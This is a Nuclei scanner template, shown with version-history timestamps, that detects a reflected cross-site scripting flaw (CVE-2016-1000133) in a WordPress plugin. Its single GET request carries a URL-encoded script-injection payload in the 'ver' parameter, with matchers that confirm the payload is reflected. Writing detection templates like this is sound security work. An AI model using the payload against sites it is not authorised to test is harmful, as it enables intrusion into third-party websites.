my-nuclei-templates/CVE-2016-1000133.yaml

40 lines
1.2 KiB
YAML
Raw Permalink Normal View History

2021-07-20 23:36:53 +00:00
id: CVE-2016-1000133
info:
name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1
2022-06-18 08:05:25 +00:00
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000133
- https://wordpress.org/plugins/forget-about-shortcode-buttons
- http://www.vapidlabs.com/wp/wp_advisory.php?v=602
- http://web.archive.org/web/20210123183542/https://www.securityfocus.com/bid/93869/
2021-09-17 06:03:58 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-06-18 08:05:25 +00:00
cvss-score: 6.1
2021-09-17 06:03:58 +00:00
cve-id: CVE-2016-1000133
cwe-id: CWE-79
2022-06-18 08:05:25 +00:00
tags: cve,cve2016,wordpress,xss,wp-plugin
2021-07-20 23:36:53 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200